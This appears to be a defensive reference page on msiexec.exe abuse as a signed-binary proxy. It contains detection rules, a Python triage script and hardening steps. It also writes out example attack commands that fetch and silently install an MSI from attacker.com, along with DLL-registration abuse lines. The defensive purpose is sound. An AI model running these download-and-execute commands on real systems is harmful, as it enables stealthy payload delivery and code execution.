msiexec.exe - Windows Installer LOLBin Security Analysis
Category: System utility
msiexec.exe is the **Windows Installer** executable for installing, modifying, and removing MSI packages. It is a **potent LOLBin**: it can **fetch and execute an MSI from an HTTP/HTTPS URL**, install packages with no user interface, and, because it is a Microsoft-signed system binary, slip past application controls that trust the image rather than the package. Attackers use it as a download-and-execute primitive for payloads staged on web servers they control.
Risk Summary
CRITICAL priority for SOC triage. msiexec.exe can install an MSI package directly from a remote URL, which turns a single command line into a download-and-execute chain. Monitor for /i (or its alias /package) with an HTTP/HTTPS source, silent flags (/q, /qn, /quiet, /passive), the DLL switches /y and /z, and package sources outside approved deployment paths. msiexec accepts '-' as well as '/' for every switch, so a rule that matches only on "/i" is trivially bypassed. An installer that fetches its own package over HTTP/HTTPS is rarely legitimate in a managed environment; treat it as malicious until the URL and package have been verified.
Overview
What is msiexec.exe?
msiexec.exe is the Windows Installer executable. The same binary serves as the command-line client a user or script invokes and, started by services.exe with the /V switch, as the Windows Installer service instance that performs the actual installation as SYSTEM.
Core Functions
Package Installation:
- Install MSI packages
- Uninstall applications
- Repair installations
- Administrative installs
Security Significance
- LOLBin Status: Listed under MITRE ATT&CK T1218.007 (System Binary Proxy Execution: Msiexec); it can install a package straight from a URL
- Silent Install: /q, /qn, /quiet and /passive suppress the UI, so the user sees nothing
- Trusted Binary: Microsoft-signed and present on every Windows host, so it is commonly allow-listed
- Elevated Execution: the service instance runs as SYSTEM; per-machine installs elevate via UAC, and a misconfigured AlwaysInstallElevated policy lets any user's package run as SYSTEM
Normal Behavior
Expected Process State
| Property | Expected Value |
|---|---|
| Path | C:\Windows\System32\msiexec.exe |
| Parent | services.exe (service instance, `msiexec /V`); explorer.exe (user double-clicks an MSI); cmd.exe, powershell.exe or a software-deployment agent for scripted installs |
| User | SYSTEM for the service instance; the initiating user for the client instance |
| Context | Software installation |
Legitimate Usage
msiexec /i package.msi
msiexec /x {GUID}
msiexec /a package.msi
Common Locations
C:\Windows\System32\msiexec.exe
C:\Windows\SysWOW64\msiexec.exe
Suspicious Indicators
Legitimate vs Suspicious
LEGITIMATE
Command: msiexec /i C:\Install\app.msi
msiexec /x {ProductGUID}
Source: Local file, network share
Context: Software deployment
SUSPICIOUS
Command: msiexec /i http://attacker.com/mal.msi /q
msiexec /q /i https://...
Source: Internet URL
Flags: /q (silent), /qn (no UI), /quiet, /passive; the same switches spelled with a leading '-' (e.g. -q, -i, -package)
Dangerous Parameters
| Parameter | Risk | Description |
|---|---|---|
| /i http://, /i https:// (also -i, /package) | CRITICAL | Package fetched from a remote URL and executed |
| /q, /qn, /quiet, /passive | HIGH | Suppresses the installer UI so the install is invisible to the user |
| /y <module> | HIGH | Calls the DLL's DllRegisterServer export (arbitrary code in the DLL runs) |
| /z <module> | HIGH | Calls DllUnregisterServer; same code-execution risk as /y |
Abuse Techniques
Attack Techniques
Technique #1: Remote MSI Execution (T1218.007)
Download and Execute:
msiexec /q /i http://attacker.com/payload.msi
msiexec /q /i https://attacker.com/malware.msi
Technique #2: DLL Registration (T1218.007)
msiexec /y malicious.dll
msiexec /z malicious.dll
Technique #3: Silent Malware Install
msiexec /i malware.msi /qn /norestart
Technique #4: MSI with Embedded Payloads
The package itself can carry the payload, so the command line looks benign:
- Custom actions (CustomAction table) that run an executable, call a DLL entry point, or execute VBScript/JScript during the InstallExecuteSequence
- Executables or DLLs stored in the Binary table and dropped at install time
- Script payloads stored inline in the CustomAction table or in the Binary table
Detection Guidance
Detection Strategies
Priority #1: Remote MSI Execution (CRITICAL)
Sigma Rule:

```yaml
title: Msiexec Remote Package Install
description: msiexec.exe started with an HTTP/HTTPS URL on its command line (remote package fetch and execute)
tags:
  - attack.defense_evasion
  - attack.t1218.007
logsource:
  product: windows
  category: process_creation
detection:
  selection:
    Image|endswith: '\msiexec.exe'
    CommandLine|contains:
      - 'http://'
      - 'https://'
  condition: selection
falsepositives:
  - Software update agents that hand msiexec a vendor URL (baseline and allow-list by parent process and domain)
level: critical
```

Because the rule matches the URL substring rather than the "/i" switch, it also catches the "-i" and "/package" spellings. It does not cover packages pulled from a UNC path (including WebDAV shares), which need a separate rule keyed on "\\" in the package operand.
Priority #2: Silent Installation
Process = "msiexec.exe" AND
CommandLine CONTAINS ANY ["/q", "-q", "/passive", "-passive"] AND
CommandLine CONTAINS ANY ["/i", "-i", "/package", "-package"]
→ ALERT: HIGH - Silent installation
("/q" also matches /qn, /qb and /quiet. Deployment tools such as SCCM and Intune run silent installs constantly; tune on parent process and package path rather than suppressing the rule.)
Priority #3: DLL Operations
Process = "msiexec.exe" AND
CommandLine CONTAINS ANY ["/y", "-y", "/z", "-z"]
→ ALERT: HIGH - DLL registration or unregistration through msiexec
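The parameter table above and the three detection priorities all reduce to the same question: what did msiexec actually do, once the switch spelling is normalised? The triage helper below is an added example for this page, not code from any vendor or project. It tokenises a process-creation command line, maps '-' switches and the long forms /package and /quiet onto their canonical names, separates switches from operands (package path, product code, DLL module), and scores the result using the page's priorities. Two assumptions are made beyond the page: a UNC package source is scored MEDIUM (WebDAV shares can be attacker-hosted), and a URL that appears only inside a PROPERTY=value pair is scored HIGH rather than CRITICAL. The command lines in SAMPLE_COMMAND_LINES are constructed, not real telemetry.

```python
"""Triage msiexec.exe process-creation command lines (added example, not vendor code).

msiexec accepts '-' as well as '/' for switches and long forms such as
/package (alias of /i) and /quiet (alias of /q), so switches are canonicalised
before matching. Scoring: URL package source -> CRITICAL; /y or /z -> HIGH;
silent install -> HIGH; UNC source -> MEDIUM (assumption, not from the page).
"""
import re
from dataclasses import dataclass, field

LONG_SWITCHES = {"package": "i", "uninstall": "x", "quiet": "q"}
SEVERITY_RANK = {"INFO": 0, "MEDIUM": 1, "HIGH": 2, "CRITICAL": 3}

URL_RE = re.compile(r"^https?://", re.IGNORECASE)
UNC_RE = re.compile(r"^\\\\[^\\]+\\")          # \\server\share\...
TOKEN_RE = re.compile(r'"[^"]*"|\S+')           # double-quoted token or bare word
IMAGE_RE = re.compile(r"msiexec(?:\.exe)?$", re.IGNORECASE)


@dataclass
class Verdict:
    severity: str
    reasons: list = field(default_factory=list)
    switches: list = field(default_factory=list)   # canonical switch names, in order
    operands: list = field(default_factory=list)   # package path / product code / module


def tokenize(cmdline):
    """Split on whitespace while honouring double quotes; backslashes stay literal."""
    return [t.strip('"') for t in TOKEN_RE.findall(cmdline)]


def canonical_switch(token):
    """'/I', '-i', '/package' -> 'i'; '/QN' -> 'qn'; '/l*v' -> 'l'; non-switch -> None."""
    if len(token) < 2 or token[0] not in "/-":
        return None
    name = token[1:].lower()
    if name.startswith("l"):                     # any /l... variant is the logging switch
        return "l"
    return LONG_SWITCHES.get(name, name)


def bump(current, proposed):
    """Raise the severity, never lower it."""
    return proposed if SEVERITY_RANK[proposed] > SEVERITY_RANK[current] else current


def triage_msiexec(cmdline):
    tokens = tokenize(cmdline)
    if tokens and IMAGE_RE.search(tokens[0]):
        tokens = tokens[1:]                      # drop the image path itself

    switches, operands = [], []
    expect_log_path = False
    for tok in tokens:
        if expect_log_path:                      # operand of /l is a log file, not a package
            expect_log_path = False
            continue
        sw = canonical_switch(tok)
        if sw:
            switches.append(sw)
            expect_log_path = sw == "l"
        elif URL_RE.match(tok) or UNC_RE.match(tok) or "=" not in tok:
            operands.append(tok)                 # PROPERTY=value pairs are not operands

    urls = [o for o in operands if URL_RE.match(o)]
    shares = [o for o in operands if UNC_RE.match(o)]
    silent = [s for s in switches if s.startswith("q") or s == "passive"]
    dll_ops = [s for s in switches if s in ("y", "z")]

    severity, reasons = "INFO", []
    if urls:
        severity = bump(severity, "CRITICAL")
        reasons.append(f"package fetched from URL: {urls[0]}")
    elif re.search(r"https?://", cmdline, re.IGNORECASE):
        severity = bump(severity, "HIGH")        # URL hidden in a property value or log path
        reasons.append("URL present outside the package operand")
    if dll_ops:
        severity = bump(severity, "HIGH")
        action = "registration" if "y" in dll_ops else "unregistration"
        reasons.append(f"DLL {action} of {operands[0] if operands else '?'}")
    if silent and "i" in switches:
        severity = bump(severity, "HIGH")
        reasons.append("silent install (" + ", ".join("/" + s for s in silent) + ")")
    if shares:
        severity = bump(severity, "MEDIUM")
        reasons.append(f"package on network share: {shares[0]}")
    return Verdict(severity, reasons, switches, operands)


# Constructed command lines (not real telemetry) covering the page's cases plus the
# dash/long-form spelling that a naive '/i' + 'http' substring match would miss.
SAMPLE_COMMAND_LINES = [
    r"msiexec /i C:\Install\app.msi",
    r"msiexec /q /i http://attacker.com/payload.msi",
    r"C:\Windows\System32\msiexec.exe -package HTTPS://cdn.example.net/update.png -quiet",
    r"msiexec /y C:\Users\Public\evil.dll",
    r"msiexec /i C:\temp\setup.msi /qn /norestart /l*v C:\temp\install.log",
    r"msiexec /i \\fileserver\deploy\agent.msi",
]

if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        v = triage_msiexec(line)
        print(f"{v.severity:<8} {line}")
        for r in v.reasons:
            print(f"         - {r}")
```

Feed it the CommandLine field from Sysmon event 1 or Security event 4688 (with command-line auditing enabled). The third sample is the one to note: no "/i", no "/q", no ".msi", and an uppercase scheme, yet it is the same remote install as the second sample once the switches are canonicalised.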
Remediation Steps
Protection and Remediation
Defense: Restrict Package Sources
AppLocker cannot filter on msiexec's command line, so it cannot block "msiexec with a URL" directly. Use its Windows Installer rules (or WDAC) so that only MSI and MSP files signed by approved publishers, or matching known hashes, can be installed; a package fetched from an attacker's server then fails the rule regardless of how it was invoked. A host-firewall or proxy rule denying outbound HTTP/HTTPS from msiexec.exe removes the download step itself, since sanctioned deployment tools stage packages locally or on file shares rather than having the installer fetch them.
Defense: Software Restriction
Set the Group Policy "Turn off Windows Installer" (registry value DisableMSI under HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer) to "For non-managed applications only" so that only administrator- or Group Policy-deployed packages install. Confirm AlwaysInstallElevated is not enabled under both HKLM and HKCU; when it is, any user's package, including a remote one, installs as SYSTEM.
If Compromise Suspected
- Identify the MSI package installed
- Check installation source (URL?)
- Review installed programs
- Check for persistence
- Analyze MSI contents
Investigation Checklist
- Review full command line
- Check for HTTP/HTTPS URLs
- Identify silent install flags
- Locate MSI package
- Analyze MSI custom actions: inspect the CustomAction, Binary and InstallExecuteSequence tables (Orca from the Windows SDK, or msiinfo from msitools) and extract any embedded executables or scripts for analysis
- Check installed software list
- Review for persistence mechanisms